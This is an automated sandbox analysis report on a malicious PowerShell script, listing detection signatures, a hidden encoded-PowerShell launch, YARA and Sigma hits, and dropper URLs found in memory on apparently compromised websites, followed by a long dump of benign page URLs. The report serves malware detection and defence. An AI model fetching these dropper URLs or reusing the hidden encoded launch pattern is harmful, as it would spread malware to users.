Analysis Report ps_script.ps1

Overview

General Information

Sample Name: ps_script.ps1
Analysis ID: 416466
MD5: afce2bf94f95c17bc64535f2a70a96d0
SHA1: eb88e2f97a2292d63d678963813a1999f69faa45
SHA256: 9edaa045dc625024afee6ac6fd532fdb27d6beb607588c326babdba0b439d602
Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Encrypted powershell cmdline option found
Potential dropper URLs found in powershell memory
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Non Interactive PowerShell
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • powershell.exe (PID: 5496 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -noLogo -ExecutionPolicy unrestricted -file 'C:\Users\user\Desktop\ps_script.ps1' MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 5344 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source: ps_script.ps1 | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
Strings:
  • 0x0:$s1: POwersheLL

Memory Dumps

Source: 00000000.00000002.333177973.00000199B1C5D000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
Strings:
  • 0x524:$s1: POwersheLL
  • 0x7704:$s1: POwersheLL
  • 0x7944:$s1: POwersheLL
  • 0x79b4:$s1: POwersheLL
  • 0x7b84:$s1: POwersheLL
  • 0x7c2c:$s1: POwersheLL
Source: 00000000.00000002.333520412.00000199C97A3000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
Strings:
  • 0x2036:$s1: powershell
  • 0x2a30:$s1: POwersheLL
  • 0x2036:$sr1: powershell
  • 0x2036:$sn1: powershell
Source: 00000000.00000003.328991391.00000199C97A3000.00000004.00000001.sdmp | Rule: PowerShell_Case_Anomaly | Description: Detects obfuscated PowerShell hacktools | Author: Florian Roth
Strings:
  • 0x2036:$s1: powershell
  • 0x2a30:$s1: POwersheLL
  • 0x2036:$sr1: powershell
  • 0x2036:$sn1: powershell

Sigma Overview

System Summary:

Sigma detected: Suspicious Encoded PowerShell Command Line
Source: Process started | Author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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
Sigma detected: Suspicious PowerShell Parameter Substring
Source: Process started | Author: Florian Roth (rule), Daniel Bohannon (idea), Roberto Rodriguez (Fix) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD [base64-encoded command line omitted]
Sigma detected: Non Interactive PowerShell
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -w hidden -ENCOD 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

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: ps_script.ps1 | Avira: detected
Antivirus detection for URL or domain
Source: http://www.hintup.com.br | Avira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/2020/12/03/faq | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/footer-logo-1.png | Avira URL Cloud: Label: phishing
Source: http://etdog.com | Avira URL Cloud: Label: phishing
Source: https://www.stmarouns.nsw.edu.au/paypal/b8G/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/themes/pandaminer/static/swiper/css/swiper.min.css | Avira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/wp-json/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/uploads/2020/12/2-2.png) | Avira URL Cloud: Label: phishing
Source: http://en.etdog.com/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/index.php/%e5%85%b3%e4%ba%8e/ | Avira URL Cloud: Label: phishing
Source: https://mikegeerinck.com/c/YYsa/ | Avira URL Cloud: Label: malware
Source: http://www.stmarouns.nsw.edu.au/paypal/b8G/ | Avira URL Cloud: Label: malware
Source: http://etdog.com/wp-content/themes/pandaminer/static/js/analytics.js | Avira URL Cloud: Label: phishing
Source: https://www.hintup.com.br/wp-content/dE/ | Avira URL Cloud: Label: phishing
Source: http://etdog.com/wp-content/themes/pandaminer/static/layer/layer.js | Avira URL Cloud: Label: phishing
Multi AV Scanner detection for domain / URL
Source: wm.mcdevelop.net | Virustotal: Detection: 6%
Source: etdog.com | Virustotal: Detection: 9%
Source: freelancerwebdesignerhyderabad.com | Virustotal: Detection: 5%
Source: www.hintup.com.br | Virustotal: Detection: 8%
Multi AV Scanner detection for submitted file
Source: ps_script.ps1 | Virustotal: Detection: 8%
Source: unknown | HTTPS traffic detected: 35.214.199.246:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.223.27:443 -> 192.168.2.3:49738 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 143.204.98.64:443 -> 192.168.2.3:49740 version: TLS 1.2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 216.127.164.209: -> 192.168.2.3:
Potential dropper URLs found in powershell memory
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://etdog.com/wp-content/nu/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: https://www.hintup.com.br/wp-content/dE/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://www.stmarouns.nsw.edu.au/paypal/b8G/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmp | String found in memory: http://wm.mcdevelop.net/content/6F2gd/
Source: global traffic | HTTP traffic detected: GET /cgi-bin/S/ HTTP/1.1 | Host: freelancerwebdesignerhyderabad.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /wp-content/nu/ HTTP/1.1 | Host: etdog.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /paypal/b8G/ HTTP/1.1 | Host: www.stmarouns.nsw.edu.au | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /content/6F2gd/ HTTP/1.1 | Host: wm.mcdevelop.net | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 162.241.148.243
Source: Joe Sandbox View | ASN Name: UNIFIEDLAYER-AS-1US
Source: Joe Sandbox View | ASN Name: AMAZON-02US
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmp | String found in binary or memory: <a data-v-6ccbd8c6="" href="https://www.facebook.com/" equals www.facebook.com (Facebook)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-49231b1" href="https://www.facebook.com/Mikegeerinck1/" target="_blank"> equals www.facebook.com (Facebook)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp | String found in binary or memory: <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-129de04" href="https://www.youtube.com/channel/UCezyOaog07qIo-EMB_zABkw?view_as=subscriber" target="_blank"> equals www.youtube.com (Youtube)
Source: A69S.dll.2.dr | String found in binary or memory: src="https://www.facebook.com/tr?id=406116357357499&ev=PageView&noscript=1" equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: admintk.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 18 May 2021 13:54:01 GMT | Server: nginx/1.19.10 | Content-Type: text/html | Content-Length: 583 | Last-Modified: Thu, 25 Feb 2021 17:54:10 GMT | Vary: Accept-Encoding | Data Raw: [hex dump omitted] | Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>
Source: powershell.exe, 00000002.00000002.316416517.000001B60FA30000.00000004.00000001.sdmpString found in binary or memory: http://x.ss2.us/x.cer0&
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://x1.c.lencr.org/0
Source: 2D85F72862B55C4EADD9E66E06947F3D.2.drString found in binary or memory: http://x1.i.lencr.org/
Source: powershell.exe, 00000002.00000002.324694985.000001B62807F000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/0
Source: powershell.exe, 00000002.00000002.324658342.000001B628066000.00000004.00000001.sdmpString found in binary or memory: http://x1.i.lencr.org/2
Source: powershell.exe, 00000002.00000002.322633813.000001B61101C000.00000004.00000001.sdmpString found in binary or memory: https://admintk.com
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://admintk.com/wp-admin/L/
Source: powershell.exe, 00000002.00000002.322633813.000001B61101C000.00000004.00000001.sdmpString found in binary or memory: https://admintk.comx
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322945003.000001B611078000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://api.w.org/
Source: A69S.dll.2.drString found in binary or memory: https://api.whatsapp.com/send?phone=5519995088264&text=Gostaria%20de%20mais%20detalhes
Source: A69S.dll.2.drString found in binary or memory: https://connect.facebook.net/en_US/fbevents.js
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://dream-media.net
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://dream-media.net/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://dream-media.net/client-accelerator-method/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://e-proposals.io/
Source: A69S.dll.2.drString found in binary or memory: https://fonts.googleapis.com/css?family=Product
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic
Source: powershell.exe, 00000002.00000002.319033051.000001B610004000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://gmpg.org/xfn/11
Source: A69S.dll.2.drString found in binary or memory: https://hintup.io
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/#website
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/30-min-strategy-session/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/?s=
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/about-me/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/blog/
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/c/YYsa/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/comments/feed/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/contact/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/feed/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/mike-daily-routine/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/our-team/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/call-to-action-box-animate-for-elementor/assets/css/eb-c
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/css/ecs-style.css?ver=3.1.0
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs.js?ver=3.1.0
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/ele-custom-skin/assets/js/ecs_ajax_pagination.js?ver=3.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.1.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.2.3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.2.3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/images/placeholder.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eico
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.cs
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/modules/controls/assets/css/widgetarea-
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/cs
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.c
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/assets/css/header-footer-element
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/frontend.min.css?ver=3.1.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/css/minified/menu-animation.min.css?ver=3.1.
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/themes/astra/assets/js/minified/flexibility.min.js?ver=3.1.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1-196x300.
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/WhatsApp-Image-2020-05-22-at-21.23.50-1.jpeg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-Logo-MG-100x98-1.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-180x180
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-192x192
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-270x270
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/02/cropped-cropped-cropped-Logo-MG-100x98-1-32x32.p
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/client-206x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/client.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/dream-mdeia-206x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/dream-mdeia.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1-207x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/olympia-1.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/proposal-202x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/proposal.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/script-201x300.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/2021/04/script.jpg
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1504.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-1525.css?ver=1621159702
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-207.css?ver=1615465769
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-494.css?ver=1621191965
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-6.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-content/uploads/elementor/css/post-892.css?ver=1621160200
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/css/dist/block-library/style.min.css?ver=5.7.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-includes/wlwmanifest.xml
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/wp-json/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.com/xmlrpc.php?rsd
Source: powershell.exe, 00000002.00000002.322999232.000001B6110BA000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinck.comx
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://mikegeerinckconsulting.com/
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://my.hintup.io
Source: powershell.exe, 00000002.00000002.323873864.000001B61FE53000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://olympiasoft.io/
Source: powershell.exe, 00000002.00000002.323183656.000001B6111FF000.00000004.00000001.sdmp, powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://schema.org
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://schema.org/WebPage
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://script-creators.com/
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://twitter.com/edog.com
Source: powershell.exe, 00000002.00000002.323123117.000001B61116B000.00000004.00000001.sdmpString found in binary or memory: https://www.baidu.com/
Source: powershell.exe, 00000002.00000002.324350205.000001B627EBD000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Source: powershell.exe, 00000002.00000002.323183656.000001B6111FF000.00000004.00000001.sdmpString found in binary or memory: https://www.googletagmanager.com/g
Source: A69S.dll.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=AW-562017657
Source: powershell.exe, 00000002.00000002.323199850.000001B611210000.00000004.00000001.sdmp, A69S.dll.2.drString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=UA-143676173-1
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.br
Source: powershell.exe, 00000002.00000002.321518239.000001B610F80000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.br/wp-content/dE/
Source: powershell.exe, 00000002.00000002.323147364.000001B6111A0000.00000004.00000001.sdmpString found in binary or memory: https://www.hintup.com.brx
Source: A69S.dll.2.drString found in binary or memory: https://www.hintup.io/images/og_image_diffstuff.png
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/mikegeerinck/
Source: powershell.exe, 00000002.00000002.323038807.000001B6110DB000.00000004.00000001.sdmpString found in binary or memory: https://www.mikegeerinck.com/blog/
